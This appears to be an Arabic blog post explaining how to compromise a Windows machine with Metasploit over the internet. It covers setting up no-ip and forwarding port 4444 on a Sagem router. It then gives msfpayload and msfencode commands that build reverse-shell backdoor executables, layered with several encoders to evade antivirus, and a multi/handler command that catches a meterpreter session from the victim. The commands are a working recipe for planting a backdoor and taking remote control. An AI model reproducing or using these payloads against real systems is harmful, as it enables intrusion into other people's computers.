مرحبا بمناسبة رمضان والغياب الطويل وكسر روتين موضوع يفتح النفس للذين فقدوا الامل في المتسبلويت شرح فتح البورت في روتر sagem fast 1201 وميزة جديدة قد لا يعرفها الكثيرين أنها أصبحت تدعم no-ip في إكسبلوات تكتب عنوانك والتجربة ستكون على bt4 attacker متصل بشبكة wifi لصديق لي وويندوز فيستا victime متصل بشبكة داخلية في المنزل وكل جهاز متصل بروتر خاص به .
نقوم في البداية بتحميل no-ip عن طريق synaptic
وأثناء تنصيب ستفتح لنا نافذة كما في الصورة التالية في تجربتي تركت المربع خالي حيث خيار عدم تفعيل nat يبدو أن هذه الخطوة مهمة لا أعرف ولكن عند نجاح الاختراق قمت بتبديل الأدوار ففي التجربة الاولى كان جهاز bt4 متصل من شبكة wifi عندما حاولت العكس أي ويندوز على wifi
في المحاولة الاولى إذا لم تنجح قم بكتابة صح على المربع الصغير الضاهر في الصورة ستسأل كيف قم بحذف البرنامج وإعادة تثبيته
بعد تنصيب no -ip جاء الدور على فتح البورت في المودم في خيار nat نضغط على port fowrarding وبعد ذلك add نكتب البورت المراد استخدامه في حالتي 4444 وبعد ذلكsave
وهذه بعض خيارات msfpayload مع وبدون تشفيرة./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e
x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E
كما نرى في الصورة في team viewer نجاح تحميل الباكدور للجهاز
نقوم بتشغيله ونحصل على session meterpreter كما في الصورة ip خارجي
play slid show to see picture
Aucun commentaire:
Enregistrer un commentaire